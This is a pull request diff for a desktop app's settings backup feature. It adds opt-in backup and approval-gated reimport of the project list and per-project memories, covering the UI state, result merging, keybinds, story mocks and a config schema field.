### PR TITLE
🤖 feat: opt-in project bundle for settings backup

### DIFF
--- a/src/browser/features/Settings/Sections/BackupSection.stories.tsx
+++ b/src/browser/features/Settings/Sections/BackupSection.stories.tsx
@@ -47,6 +47,16 @@ function renderBackupSection() {
                 token: "8d2e4787fcc88a36cbd9067997213f1a791ec3999af6e9bf2259f6f3a1a0337e",
               },
             ],
+            projectImports: [
+              {
+                sourcePath: "/home/dev/src/rocket",
+                name: "rocket",
+                gitRemote: "git@github.com:dev/rocket.git",
+                memoryFileCount: 3,
+                token: "1f4c9a2b8d6e0f31a5c7e9b2d4f6081a3c5e7f9b1d3f5a7c9e1b3d5f7a9c1e3b",
+              },
+            ],
+            projectBundleSkipped: false,
           },
         })
       }

--- a/src/browser/features/Settings/Sections/BackupSection.stories.tsx
+++ b/src/browser/features/Settings/Sections/BackupSection.stories.tsx
@@ -57,6 +57,7 @@ function renderBackupSection() {
               },
             ],
             projectBundleSkipped: false,
+            pushError: null,
           },
         })
       }

--- a/src/browser/features/Settings/Sections/BackupSection.stories.tsx
+++ b/src/browser/features/Settings/Sections/BackupSection.stories.tsx
@@ -82,6 +82,7 @@ export const Configured: Story = {
     await canvas.findByText(/github\.headers\.Authorization/i);
     await canvas.findByText("agents/local-only.md");
     await canvas.findByRole("checkbox", { name: "Approve MCP command changes" });
+    await canvas.findByText("Projects to reimport");
   },
 };
 
@@ -95,4 +96,14 @@ export const Phone: Story = {
     },
   },
   render: renderBackupSection,
+  // The import cards only exist after a preview, so the pinned phone snapshot must open
+  // one or it never exercises the narrow card layout and its long repository-controlled
+  // strings.
+  play: async ({ canvasElement }) => {
+    const canvas = within(canvasElement);
+    await canvas.findByText("Settings backup");
+    await userEvent.click(canvas.getByRole("button", { name: "Preview changes" }));
+    await canvas.findByText("Projects to reimport");
+    await canvas.findByRole("checkbox", { name: /Import project/ });
+  },
 };

--- a/src/browser/features/Settings/Sections/BackupSection.tsx
+++ b/src/browser/features/Settings/Sections/BackupSection.tsx
@@ -413,6 +413,11 @@ export function BackupSection() {
     setStatusMessage(null);
     setPreview(null);
     setOverrideSecretScan(false);
+    // The project half of the preview is cleared with the rest of it: left standing through
+    // a failed preview, the old cards would offer a plan the repository no longer describes.
+    setProjectImports([]);
+    setProjectBundleSkipped(false);
+    setProjectImportResults([]);
 
     try {
       const result = await api.backup.preview(savedDraft);

--- a/src/browser/features/Settings/Sections/BackupSection.tsx
+++ b/src/browser/features/Settings/Sections/BackupSection.tsx
@@ -265,7 +265,6 @@ export function BackupSection() {
           setApproveCommands(false);
           setProjectImports([]);
           setProjectImportSelections({});
-          setProjectImportResults([]);
           setProjectBundleSkipped(false);
           setRestoreConfirmationOpen(false);
           setActionError(null);
@@ -375,11 +374,13 @@ export function BackupSection() {
       setPreview(null);
       // With the preview: they describe the repository that was previewed, and carrying
       // them past a save would show, and resend on restore, another repository's approvals.
+      // Import results are not among them: they describe files added and projects
+      // registered on this machine, which changing a setting does not undo, and are the only
+      // record of what undoing an import means removing.
       setCommandApprovals([]);
       setApproveCommands(false);
       setProjectImports([]);
       setProjectImportSelections({});
-      setProjectImportResults([]);
       setProjectBundleSkipped(false);
       setOverrideSecretScan(false);
       setSecretScanBlocked(false);

--- a/src/browser/features/Settings/Sections/BackupSection.tsx
+++ b/src/browser/features/Settings/Sections/BackupSection.tsx
@@ -119,6 +119,34 @@ function importResultTone(result: BackupProjectImportResult): string {
   return result.skippedFiles.length > 0 ? "text-warning" : "text-success";
 }
 
+/**
+ * Results of a later restore run merged over the earlier ones, per import. The files an
+ * earlier attempt added stay listed — a retry finds them in place and reports only what it
+ * added itself — and a registration the earlier attempt made stays marked, since neither is
+ * covered by the safety snapshot and both are what undoing the import means removing.
+ */
+function mergeImportResults(
+  previous: readonly BackupProjectImportResult[],
+  next: readonly BackupProjectImportResult[]
+): BackupProjectImportResult[] {
+  const key = (result: BackupProjectImportResult) => `${result.sourcePath}\0${result.targetPath}`;
+  const merged = new Map(previous.map((result) => [key(result), result]));
+  for (const result of next) {
+    const earlier = merged.get(key(result));
+    merged.set(
+      key(result),
+      earlier === undefined
+        ? result
+        : {
+            ...result,
+            writtenFiles: [...new Set([...earlier.writtenFiles, ...result.writtenFiles])],
+            registered: earlier.registered || result.registered,
+          }
+    );
+  }
+  return [...merged.values()];
+}
+
 function describeRestoredFiles(count: number): string {
   if (count === 0) return "settings; no files changed";
   return `${count} file${count === 1 ? "" : "s"}`;
@@ -415,9 +443,11 @@ export function BackupSection() {
     setOverrideSecretScan(false);
     // The project half of the preview is cleared with the rest of it: left standing through
     // a failed preview, the old cards would offer a plan the repository no longer describes.
+    // Import results are not part of the preview and stay: they list what earlier restores
+    // wrote and registered, which the user needs to undo an import and a preview does not
+    // change.
     setProjectImports([]);
     setProjectBundleSkipped(false);
-    setProjectImportResults([]);
 
     try {
       const result = await api.backup.preview(savedDraft);
@@ -450,7 +480,6 @@ export function BackupSection() {
         return next;
       });
       setProjectBundleSkipped(result.data.projectBundleSkipped);
-      setProjectImportResults([]);
       setStatusMessage("Preview refreshed.");
     } catch (error) {
       setActionError(getErrorMessage(error));
@@ -565,7 +594,9 @@ export function BackupSection() {
           unapproved.map((candidate) => [candidate.token, { approved: false, targetPath: "" }])
         )
       );
-      setProjectImportResults(result.data.projectImportResults);
+      setProjectImportResults((previous) =>
+        mergeImportResults(previous, result.data.projectImportResults)
+      );
       setProjectBundleSkipped(result.data.projectBundleSkipped);
       setStatusMessage(
         `Restored ${describeRestoredFiles(result.data.changedFiles.length)}. Safety snapshot: ${result.data.snapshotPath}${
@@ -1045,8 +1076,8 @@ export function BackupSection() {
                 ) : null}
                 {importResult.writtenFiles.length > 0 ? (
                   <span className="text-muted block break-all">
-                    Added {importResult.writtenFiles.length} memory{" "}
-                    {importResult.writtenFiles.length === 1 ? "file" : "files"}
+                    Added memory {importResult.writtenFiles.length === 1 ? "file" : "files"}:{" "}
+                    {importResult.writtenFiles.join(", ")}
                   </span>
                 ) : null}
                 {importResult.registered ? (

--- a/src/browser/features/Settings/Sections/BackupSection.tsx
+++ b/src/browser/features/Settings/Sections/BackupSection.tsx
@@ -104,6 +104,21 @@ function getCredentialLabel(credential: BackupValidation["credential"]): string 
  * Preferences restore through config rather than a file, so a run that only changed
  * preferences reports zero files. Saying "no files changed" avoids reading as a no-op.
  */
+/**
+ * An import that skipped conflicting files is not a success: no origin was recorded for it and
+ * the candidate is offered again, so the same screen must not call it imported in green while
+ * asking for another approval.
+ */
+function importResultLabel(result: BackupProjectImportResult): string {
+  if (result.status === "failed") return "Failed";
+  return result.skippedFiles.length > 0 ? "Partially imported" : "Imported";
+}
+
+function importResultTone(result: BackupProjectImportResult): string {
+  if (result.status === "failed") return "text-error";
+  return result.skippedFiles.length > 0 ? "text-warning" : "text-success";
+}
+
 function describeRestoredFiles(count: number): string {
   if (count === 0) return "settings; no files changed";
   return `${count} file${count === 1 ? "" : "s"}`;
@@ -1017,11 +1032,8 @@ export function BackupSection() {
                 key={`${importResult.sourcePath}:${importResult.targetPath}`}
                 className="min-w-0 text-xs"
               >
-                <span
-                  className={`${importResult.status === "imported" ? "text-success" : "text-error"} block break-all`}
-                >
-                  {importResult.status === "imported" ? "Imported" : "Failed"}: {importResult.name}{" "}
-                  → {importResult.targetPath}
+                <span className={`${importResultTone(importResult)} block break-all`}>
+                  {importResultLabel(importResult)}: {importResult.name} → {importResult.targetPath}
                 </span>
                 {importResult.message != null ? (
                   <span className="text-muted block break-all">{importResult.message}</span>
@@ -1031,6 +1043,9 @@ export function BackupSection() {
                     Added {importResult.writtenFiles.length} memory{" "}
                     {importResult.writtenFiles.length === 1 ? "file" : "files"}
                   </span>
+                ) : null}
+                {importResult.registered ? (
+                  <span className="text-muted block break-all">Newly registered project</span>
                 ) : null}
                 {importResult.skippedFiles.length > 0 ? (
                   <span className="text-warning block break-all">
@@ -1042,8 +1057,12 @@ export function BackupSection() {
             ))}
           </ul>
           <p className="text-muted text-xs">
-            Project registrations are not covered by the safety snapshot; remove imported projects
-            manually to undo them.
+            The safety snapshot does not cover imported memory files or project registrations. To
+            undo an import, delete the added files
+            {projectImportResults.some((importResult) => importResult.registered)
+              ? " and remove the projects marked as newly registered"
+              : ""}
+            .
           </p>
         </div>
       ) : null}

--- a/src/browser/features/Settings/Sections/BackupSection.tsx
+++ b/src/browser/features/Settings/Sections/BackupSection.tsx
@@ -665,7 +665,8 @@ export function BackupSection() {
           <span className="min-w-0">
             <span className="text-foreground block text-xs font-medium">
               Include project list &amp; project memories
-              <span className="text-muted ml-1 font-normal">
+              {/* Shortcut hint only; the shortcut itself stays bound on every viewport. */}
+              <span className="text-muted ml-1 hidden font-normal sm:inline">
                 ({formatKeybind(KEYBINDS.SETTINGS_BACKUP_TOGGLE_PROJECTS)})
               </span>
             </span>

--- a/src/browser/features/Settings/Sections/BackupSection.tsx
+++ b/src/browser/features/Settings/Sections/BackupSection.tsx
@@ -539,12 +539,26 @@ export function BackupSection() {
       setSecretScanBlocked(false);
       setCommandApprovals([]);
       setApproveCommands(false);
-      setProjectImports([]);
-      setProjectImportSelections({});
+      // Candidates the restore left out for lack of approval stay on offer with their fresh
+      // tokens, so a restore run without a preview never hides backed-up projects.
+      const unapproved = result.data.unapprovedProjectImports;
+      setProjectImports(unapproved);
+      setProjectImportSelections(
+        Object.fromEntries(
+          unapproved.map((candidate) => [
+            candidate.token,
+            { approved: false, targetPath: candidate.sourcePath },
+          ])
+        )
+      );
       setProjectImportResults(result.data.projectImportResults);
       setProjectBundleSkipped(result.data.projectBundleSkipped);
       setStatusMessage(
-        `Restored ${describeRestoredFiles(result.data.changedFiles.length)}. Safety snapshot: ${result.data.snapshotPath}`
+        `Restored ${describeRestoredFiles(result.data.changedFiles.length)}. Safety snapshot: ${result.data.snapshotPath}${
+          unapproved.length === 0
+            ? ""
+            : ` ${unapproved.length} backed-up ${unapproved.length === 1 ? "project was" : "projects were"} not imported; approve them below to import.`
+        }`
       );
       setRestoreConfirmationOpen(false);
     } catch (error) {

--- a/src/browser/features/Settings/Sections/BackupSection.tsx
+++ b/src/browser/features/Settings/Sections/BackupSection.tsx
@@ -113,11 +113,15 @@ function ChangeList(props: {
   title: string;
   emptyLabel: string;
   changes: BackupPreview["pushChanges"];
+  /** Replaces the list when this half of the preview could not be computed. */
+  error?: string | null;
 }) {
   return (
     <div className="border-border-light min-w-0 rounded-md border p-3">
       <h4 className="text-foreground text-xs font-medium">{props.title}</h4>
-      {props.changes.length === 0 ? (
+      {props.error != null ? (
+        <p className="text-error mt-2 text-xs break-words">{props.error}</p>
+      ) : props.changes.length === 0 ? (
         <p className="text-muted mt-2 text-xs">{props.emptyLabel}</p>
       ) : (
         <ul className="mt-2 space-y-1.5">
@@ -780,6 +784,7 @@ export function BackupSection() {
                 title="Backup to repository"
                 emptyLabel="No repository changes."
                 changes={preview.pushChanges}
+                error={preview.pushError}
               />
               <ChangeList
                 title="Restore to this device"

--- a/src/browser/features/Settings/Sections/BackupSection.tsx
+++ b/src/browser/features/Settings/Sections/BackupSection.tsx
@@ -954,7 +954,8 @@ export function BackupSection() {
                       aria-label={`Import project ${candidate.name}`}
                     />
                     <span className="min-w-0 flex-1">
-                      <span className="text-foreground block text-xs font-medium">
+                      {/* break-all: the name is repository-controlled and may be one long token. */}
+                      <span className="text-foreground block text-xs font-medium break-all">
                         {candidate.name}
                         <span className="text-muted ml-1 font-normal">
                           ({candidate.memoryFileCount} memory{" "}

--- a/src/browser/features/Settings/Sections/BackupSection.tsx
+++ b/src/browser/features/Settings/Sections/BackupSection.tsx
@@ -424,7 +424,7 @@ export function BackupSection() {
         for (const candidate of nextImports) {
           next[candidate.token] = current[candidate.token] ?? {
             approved: false,
-            targetPath: candidate.sourcePath,
+            targetPath: "",
           };
         }
         return next;
@@ -525,10 +525,7 @@ export function BackupSection() {
           setProjectImports(nextImports);
           setProjectImportSelections(
             Object.fromEntries(
-              nextImports.map((candidate) => [
-                candidate.token,
-                { approved: false, targetPath: candidate.sourcePath },
-              ])
+              nextImports.map((candidate) => [candidate.token, { approved: false, targetPath: "" }])
             )
           );
         }
@@ -545,10 +542,7 @@ export function BackupSection() {
       setProjectImports(unapproved);
       setProjectImportSelections(
         Object.fromEntries(
-          unapproved.map((candidate) => [
-            candidate.token,
-            { approved: false, targetPath: candidate.sourcePath },
-          ])
+          unapproved.map((candidate) => [candidate.token, { approved: false, targetPath: "" }])
         )
       );
       setProjectImportResults(result.data.projectImportResults);
@@ -951,7 +945,7 @@ export function BackupSection() {
             {projectImports.map((candidate) => {
               const selection = projectImportSelections[candidate.token] ?? {
                 approved: false,
-                targetPath: candidate.sourcePath,
+                targetPath: "",
               };
               return (
                 <li key={candidate.token} className="border-border-light rounded-md border p-3">
@@ -1000,7 +994,10 @@ export function BackupSection() {
                           [candidate.token]: { ...selection, targetPath: event.target.value },
                         }))
                       }
-                      placeholder={candidate.sourcePath}
+                      // Never prefilled from the backup: the recorded path is repository-
+                      // controlled, and on Windows a UNC path merely probed by the restore
+                      // would start SMB authentication. The user names a local directory.
+                      placeholder="Absolute path of the local checkout"
                       disabled={busy}
                     />
                   </label>

--- a/src/browser/features/Settings/Sections/BackupSection.tsx
+++ b/src/browser/features/Settings/Sections/BackupSection.tsx
@@ -468,6 +468,11 @@ export function BackupSection() {
       setOverrideSecretScan(false);
       setSecretScanBlocked(false);
       setSecretScanApproval(null);
+      // The push replaced the remote bundle the candidates and the skipped flag described;
+      // their tokens no longer match anything, so a restore would only be refused.
+      setProjectImports([]);
+      setProjectImportSelections({});
+      setProjectBundleSkipped(false);
       setStatusMessage(
         `Backed up settings at ${result.data.commit} using ${getCredentialLabel(result.data.credential)}.`
       );

--- a/src/browser/features/Settings/Sections/BackupSection.tsx
+++ b/src/browser/features/Settings/Sections/BackupSection.tsx
@@ -950,13 +950,13 @@ export function BackupSection() {
                           {candidate.memoryFileCount === 1 ? "file" : "files"})
                         </span>
                       </span>
-                      <span className="text-muted mt-0.5 block break-all text-xs">
+                      <span className="text-muted mt-0.5 block text-xs break-all">
                         Backed up from: {candidate.sourcePath}
                       </span>
                       {/* Inert text on purpose: the remote is repository-controlled data,
                           never a link and never executed. */}
                       {candidate.gitRemote != null ? (
-                        <span className="text-muted mt-0.5 block break-all text-xs">
+                        <span className="text-muted mt-0.5 block text-xs break-all">
                           Remote: {candidate.gitRemote}
                         </span>
                       ) : null}

--- a/src/browser/features/Settings/Sections/BackupSection.tsx
+++ b/src/browser/features/Settings/Sections/BackupSection.tsx
@@ -24,7 +24,15 @@ type BackupSuccessData<Route extends Exclude<BackupRoute, "getSettings">> = Extr
 type BackupValidation = BackupSuccessData<"validate">;
 type BackupPreview = BackupSuccessData<"preview">;
 type BackupCommandApproval = BackupPreview["commandApprovals"][number];
+type BackupProjectImport = BackupPreview["projectImports"][number];
+type BackupProjectImportResult = BackupSuccessData<"restore">["projectImportResults"][number];
 type BackupOperationError = Extract<BackupRouteOutput<"push">, { success: false }>["error"];
+
+/** Per-candidate approval state, keyed by the candidate's content-bound token. */
+interface ProjectImportSelection {
+  approved: boolean;
+  targetPath: string;
+}
 
 const BACKUP_SHORTCUTS = [
   ["save", KEYBINDS.SETTINGS_BACKUP_SAVE],
@@ -34,6 +42,7 @@ const BACKUP_SHORTCUTS = [
   ["restore", KEYBINDS.SETTINGS_BACKUP_RESTORE],
   ["toggleOverride", KEYBINDS.SETTINGS_BACKUP_OVERRIDE_SECRET_SCAN],
   ["toggleApproveCommands", KEYBINDS.SETTINGS_BACKUP_APPROVE_COMMANDS],
+  ["toggleProjects", KEYBINDS.SETTINGS_BACKUP_TOGGLE_PROJECTS],
 ] as const;
 
 type BackupShortcutAction = (typeof BACKUP_SHORTCUTS)[number][0];
@@ -54,14 +63,25 @@ const DEFAULT_DRAFT: BackupDraft = {
   repoUrl: "",
   branch: "main",
   path: "xum/",
+  includeProjects: false,
 };
 
 function toDraft(settings: SettingsBackupInput): BackupDraft {
-  return { repoUrl: settings.repoUrl, branch: settings.branch, path: settings.path };
+  return {
+    repoUrl: settings.repoUrl,
+    branch: settings.branch,
+    path: settings.path,
+    includeProjects: settings.includeProjects === true,
+  };
 }
 
 function draftsEqual(left: BackupDraft, right: BackupDraft): boolean {
-  return left.repoUrl === right.repoUrl && left.branch === right.branch && left.path === right.path;
+  return (
+    left.repoUrl === right.repoUrl &&
+    left.branch === right.branch &&
+    left.path === right.path &&
+    (left.includeProjects === true) === (right.includeProjects === true)
+  );
 }
 
 function getOperationErrorMessage(error: BackupOperationError): string {
@@ -132,6 +152,12 @@ export function BackupSection() {
   const [secretScanApproval, setSecretScanApproval] = useState<string | null>(null);
   const [commandApprovals, setCommandApprovals] = useState<BackupCommandApproval[]>([]);
   const [approveCommands, setApproveCommands] = useState(false);
+  const [projectImports, setProjectImports] = useState<BackupProjectImport[]>([]);
+  const [projectImportSelections, setProjectImportSelections] = useState<
+    Record<string, ProjectImportSelection>
+  >({});
+  const [projectImportResults, setProjectImportResults] = useState<BackupProjectImportResult[]>([]);
+  const [projectBundleSkipped, setProjectBundleSkipped] = useState(false);
   const [restoreConfirmationOpen, setRestoreConfirmationOpen] = useState(false);
   const refreshGenerationRef = useRef(0);
   const draftRef = useRef(draft);
@@ -190,6 +216,10 @@ export function BackupSection() {
           setSecretScanApproval(null);
           setCommandApprovals([]);
           setApproveCommands(false);
+          setProjectImports([]);
+          setProjectImportSelections({});
+          setProjectImportResults([]);
+          setProjectBundleSkipped(false);
           setRestoreConfirmationOpen(false);
           setActionError(null);
           setStatusMessage(null);
@@ -282,6 +312,7 @@ export function BackupSection() {
         repoUrl: draft.repoUrl.trim(),
         branch: draft.branch.trim(),
         path: draft.path.trim(),
+        includeProjects: draft.includeProjects === true,
       });
       if (!result.success) {
         setSaveError(getOperationErrorMessage(result.error));
@@ -299,6 +330,10 @@ export function BackupSection() {
       // them past a save would show, and resend on restore, another repository's approvals.
       setCommandApprovals([]);
       setApproveCommands(false);
+      setProjectImports([]);
+      setProjectImportSelections({});
+      setProjectImportResults([]);
+      setProjectBundleSkipped(false);
       setOverrideSecretScan(false);
       setSecretScanBlocked(false);
       setStatusMessage("Backup settings saved.");
@@ -376,6 +411,22 @@ export function BackupSection() {
         nextApprovals.every((approval, index) => commandApprovals[index]?.token === approval.token);
       setCommandApprovals(nextApprovals);
       if (!sameCommands) setApproveCommands(false);
+      const nextImports = result.data.projectImports;
+      setProjectImports(nextImports);
+      // Tokens are content-bound, so a selection carried over by token still describes the
+      // exact entry the user approved; anything else starts unapproved.
+      setProjectImportSelections((current) => {
+        const next: Record<string, ProjectImportSelection> = {};
+        for (const candidate of nextImports) {
+          next[candidate.token] = current[candidate.token] ?? {
+            approved: false,
+            targetPath: candidate.sourcePath,
+          };
+        }
+        return next;
+      });
+      setProjectBundleSkipped(result.data.projectBundleSkipped);
+      setProjectImportResults([]);
       setStatusMessage("Preview refreshed.");
     } catch (error) {
       setActionError(getErrorMessage(error));
@@ -433,6 +484,14 @@ export function BackupSection() {
       const result = await api.backup.restore({
         ...savedDraft,
         approvedCommandTokens: approveCommands ? commandApprovals.map((item) => item.token) : [],
+        // Only candidates the user explicitly checked; the backend re-verifies each token
+        // against the checked-out payload and validates the target path.
+        projectImports: projectImports
+          .filter((candidate) => projectImportSelections[candidate.token]?.approved === true)
+          .map((candidate) => ({
+            token: candidate.token,
+            targetPath: projectImportSelections[candidate.token]?.targetPath.trim() ?? "",
+          })),
       });
       if (!result.success) {
         // A failure after the snapshot completed may have overwritten files already; the
@@ -450,6 +509,20 @@ export function BackupSection() {
           setCommandApprovals(result.error.commandApprovals ?? []);
           setApproveCommands(false);
         }
+        // Same round trip for project imports: stale tokens come back with the current
+        // candidate list, which needs fresh approvals.
+        if (result.error.code === "PROJECT_IMPORT_APPROVAL_REQUIRED") {
+          const nextImports = result.error.projectImports ?? [];
+          setProjectImports(nextImports);
+          setProjectImportSelections(
+            Object.fromEntries(
+              nextImports.map((candidate) => [
+                candidate.token,
+                { approved: false, targetPath: candidate.sourcePath },
+              ])
+            )
+          );
+        }
         return;
       }
       setPreview(null);
@@ -457,6 +530,10 @@ export function BackupSection() {
       setSecretScanBlocked(false);
       setCommandApprovals([]);
       setApproveCommands(false);
+      setProjectImports([]);
+      setProjectImportSelections({});
+      setProjectImportResults(result.data.projectImportResults);
+      setProjectBundleSkipped(result.data.projectBundleSkipped);
       setStatusMessage(
         `Restored ${describeRestoredFiles(result.data.changedFiles.length)}. Safety snapshot: ${result.data.snapshotPath}`
       );
@@ -491,6 +568,11 @@ export function BackupSection() {
     toggleApproveCommands: () => {
       if (!busy && commandApprovals.length > 0) {
         setApproveCommands((current) => !current);
+      }
+    },
+    toggleProjects: () => {
+      if (!busy) {
+        setDraft((current) => ({ ...current, includeProjects: current.includeProjects !== true }));
       }
     },
   };
@@ -571,6 +653,30 @@ export function BackupSection() {
           </label>
         </div>
 
+        <label className="flex items-start gap-2">
+          <Checkbox
+            checked={draft.includeProjects === true}
+            onCheckedChange={(checked) =>
+              setDraft((current) => ({ ...current, includeProjects: checked === true }))
+            }
+            disabled={busy}
+            aria-label="Include project list and project memories"
+          />
+          <span className="min-w-0">
+            <span className="text-foreground block text-xs font-medium">
+              Include project list &amp; project memories
+              <span className="text-muted ml-1 font-normal">
+                ({formatKeybind(KEYBINDS.SETTINGS_BACKUP_TOGGLE_PROJECTS)})
+              </span>
+            </span>
+            <span className="text-muted mt-0.5 block text-xs">
+              Adds your project list and per-project memories to the backup, and lets a restore
+              reimport them on another machine. Previously pushed backups keep project data in the
+              repository&apos;s git history even after disabling.
+            </span>
+          </span>
+        </label>
+
         <div className="flex flex-col gap-2 sm:flex-row sm:items-center">
           <Button
             size="sm"
@@ -592,7 +698,12 @@ export function BackupSection() {
           <p className="text-muted mt-1 text-xs">Only portable, allowlisted settings are copied.</p>
         </div>
         <ul className="grid gap-2 sm:grid-cols-2">
-          {INCLUDED_SETTINGS.map((item) => (
+          {[
+            ...INCLUDED_SETTINGS,
+            ...(savedDraft.includeProjects === true
+              ? (["Project list & project memories"] as const)
+              : []),
+          ].map((item) => (
             <li key={item} className="text-muted flex items-center gap-2 text-xs">
               <CheckCircle2 className="text-success h-3.5 w-3.5 shrink-0" />
               {item}
@@ -790,6 +901,127 @@ export function BackupSection() {
               </ul>
             </span>
           </label>
+        </div>
+      ) : null}
+
+      {projectBundleSkipped ? (
+        <div className="border-border-light text-muted rounded-md border p-3 text-xs">
+          This backup carries a project bundle, but project backup is disabled here, so it was
+          skipped. Enable “Include project list &amp; project memories” and save to restore it.
+        </div>
+      ) : null}
+
+      {projectImports.length > 0 ? (
+        <div className="border-border-light space-y-3 rounded-md border p-3">
+          <div>
+            <h4 className="text-foreground text-xs font-medium">Projects to reimport</h4>
+            <p className="text-muted mt-1 text-xs">
+              These backed-up projects are not registered here at their recorded paths. Nothing is
+              written for them unless you approve an import: clone or locate the project directory
+              yourself, enter its local path, and check the project. Approving registers the project
+              and adds its memories without overwriting existing files.
+            </p>
+          </div>
+          <ul className="space-y-3">
+            {projectImports.map((candidate) => {
+              const selection = projectImportSelections[candidate.token] ?? {
+                approved: false,
+                targetPath: candidate.sourcePath,
+              };
+              return (
+                <li key={candidate.token} className="border-border-light rounded-md border p-3">
+                  <label className="flex items-start gap-2">
+                    <Checkbox
+                      checked={selection.approved}
+                      onCheckedChange={(checked) =>
+                        setProjectImportSelections((current) => ({
+                          ...current,
+                          [candidate.token]: { ...selection, approved: checked === true },
+                        }))
+                      }
+                      disabled={busy}
+                      aria-label={`Import project ${candidate.name}`}
+                    />
+                    <span className="min-w-0 flex-1">
+                      <span className="text-foreground block text-xs font-medium">
+                        {candidate.name}
+                        <span className="text-muted ml-1 font-normal">
+                          ({candidate.memoryFileCount} memory{" "}
+                          {candidate.memoryFileCount === 1 ? "file" : "files"})
+                        </span>
+                      </span>
+                      <span className="text-muted mt-0.5 block break-all text-xs">
+                        Backed up from: {candidate.sourcePath}
+                      </span>
+                      {/* Inert text on purpose: the remote is repository-controlled data,
+                          never a link and never executed. */}
+                      {candidate.gitRemote != null ? (
+                        <span className="text-muted mt-0.5 block break-all text-xs">
+                          Remote: {candidate.gitRemote}
+                        </span>
+                      ) : null}
+                    </span>
+                  </label>
+                  <label className="mt-2 block space-y-1.5">
+                    <span className="text-foreground text-xs font-medium">
+                      Local project directory
+                    </span>
+                    <Input
+                      value={selection.targetPath}
+                      onChange={(event) =>
+                        setProjectImportSelections((current) => ({
+                          ...current,
+                          [candidate.token]: { ...selection, targetPath: event.target.value },
+                        }))
+                      }
+                      placeholder={candidate.sourcePath}
+                      disabled={busy}
+                    />
+                  </label>
+                </li>
+              );
+            })}
+          </ul>
+        </div>
+      ) : null}
+
+      {projectImportResults.length > 0 ? (
+        <div className="border-border-light space-y-2 rounded-md border p-3">
+          <h4 className="text-foreground text-xs font-medium">Project import results</h4>
+          <ul className="space-y-2">
+            {projectImportResults.map((importResult) => (
+              <li
+                key={`${importResult.sourcePath}:${importResult.targetPath}`}
+                className="min-w-0 text-xs"
+              >
+                <span
+                  className={`${importResult.status === "imported" ? "text-success" : "text-error"} block break-all`}
+                >
+                  {importResult.status === "imported" ? "Imported" : "Failed"}: {importResult.name}{" "}
+                  → {importResult.targetPath}
+                </span>
+                {importResult.message != null ? (
+                  <span className="text-muted block break-all">{importResult.message}</span>
+                ) : null}
+                {importResult.writtenFiles.length > 0 ? (
+                  <span className="text-muted block break-all">
+                    Added {importResult.writtenFiles.length} memory{" "}
+                    {importResult.writtenFiles.length === 1 ? "file" : "files"}
+                  </span>
+                ) : null}
+                {importResult.skippedFiles.length > 0 ? (
+                  <span className="text-warning block break-all">
+                    Kept existing files with different content:{" "}
+                    {importResult.skippedFiles.join(", ")}
+                  </span>
+                ) : null}
+              </li>
+            ))}
+          </ul>
+          <p className="text-muted text-xs">
+            Project registrations are not covered by the safety snapshot; remove imported projects
+            manually to undo them.
+          </p>
         </div>
       ) : null}
 

--- a/src/browser/features/Settings/Sections/KeybindsSection.tsx
+++ b/src/browser/features/Settings/Sections/KeybindsSection.tsx
@@ -84,6 +84,7 @@ const KEYBIND_LABELS: Record<keyof typeof KEYBINDS, string> = {
   SETTINGS_BACKUP_RESTORE: "Restore settings backup",
   SETTINGS_BACKUP_OVERRIDE_SECRET_SCAN: "Toggle secret scan override",
   SETTINGS_BACKUP_APPROVE_COMMANDS: "Toggle MCP command approval",
+  SETTINGS_BACKUP_TOGGLE_PROJECTS: "Toggle project backup",
   // Modal-only keybinds; intentionally omitted from KEYBIND_GROUPS.
   CONFIRM_DIALOG_YES: "Confirm dialog action",
   CONFIRM_DIALOG_NO: "Cancel dialog action",
@@ -231,6 +232,7 @@ const KEYBIND_GROUPS: Array<{
       "SETTINGS_BACKUP_RESTORE",
       "SETTINGS_BACKUP_OVERRIDE_SECRET_SCAN",
       "SETTINGS_BACKUP_APPROVE_COMMANDS",
+      "SETTINGS_BACKUP_TOGGLE_PROJECTS",
     ],
   },
   {

--- a/src/browser/stories/mocks/orpc.ts
+++ b/src/browser/stories/mocks/orpc.ts
@@ -624,6 +624,8 @@ export function createMockORPCClient(options: MockORPCClientOptions = {}): APICl
     localOnlyFiles: [],
     redactions: [],
     commandApprovals: [],
+    projectImports: [],
+    projectBundleSkipped: false,
   };
   const backupPushResult: MockBackupData<"push"> = backupPush ?? {
     commit: "abc1234",
@@ -636,6 +638,8 @@ export function createMockORPCClient(options: MockORPCClientOptions = {}): APICl
     snapshotPath: "/tmp/mux-backup-snapshot",
     changedFiles: [],
     localOnlyFiles: [],
+    projectImportResults: [],
+    projectBundleSkipped: false,
   };
 
   let layoutPresets = initialLayoutPresets ?? DEFAULT_LAYOUT_PRESETS_CONFIG;

--- a/src/browser/stories/mocks/orpc.ts
+++ b/src/browser/stories/mocks/orpc.ts
@@ -626,6 +626,7 @@ export function createMockORPCClient(options: MockORPCClientOptions = {}): APICl
     commandApprovals: [],
     projectImports: [],
     projectBundleSkipped: false,
+    pushError: null,
   };
   const backupPushResult: MockBackupData<"push"> = backupPush ?? {
     commit: "abc1234",

--- a/src/browser/stories/mocks/orpc.ts
+++ b/src/browser/stories/mocks/orpc.ts
@@ -641,6 +641,7 @@ export function createMockORPCClient(options: MockORPCClientOptions = {}): APICl
     localOnlyFiles: [],
     projectImportResults: [],
     projectBundleSkipped: false,
+    unapprovedProjectImports: [],
   };
 
   let layoutPresets = initialLayoutPresets ?? DEFAULT_LAYOUT_PRESETS_CONFIG;

--- a/src/browser/utils/ui/keybinds.ts
+++ b/src/browser/utils/ui/keybinds.ts
@@ -531,6 +531,8 @@ export const KEYBINDS = {
   SETTINGS_BACKUP_RESTORE: { key: "r", code: "KeyR", ctrl: true, alt: true },
   SETTINGS_BACKUP_OVERRIDE_SECRET_SCAN: { key: "o", code: "KeyO", ctrl: true, alt: true },
   SETTINGS_BACKUP_APPROVE_COMMANDS: { key: "a", code: "KeyA", ctrl: true, alt: true },
+  // Not Ctrl+Alt+P: that is PIN_WORKSPACE, which is global.
+  SETTINGS_BACKUP_TOGGLE_PROJECTS: { key: "j", code: "KeyJ", ctrl: true, alt: true },
 
   /** Confirm action in confirmation dialogs */
   CONFIRM_DIALOG_YES: { key: "y", allowShift: true },

--- a/src/common/config/schemas/appConfigOnDisk.ts
+++ b/src/common/config/schemas/appConfigOnDisk.ts
@@ -209,6 +209,9 @@ export const AppConfigOnDiskSchema = z
     // Legacy: 1Password integration was removed. Old builds still read/write this
     // key, so it is round-tripped for downgrade compatibility but unused at runtime.
     onePasswordAccountName: z.string().optional(),
+    // A fresh random value per save (see Config.configFileWriteGeneration): lets a reader
+    // tell two writes of the same bytes apart, which no timestamp or inode reliably can.
+    writeId: z.string().optional(),
   })
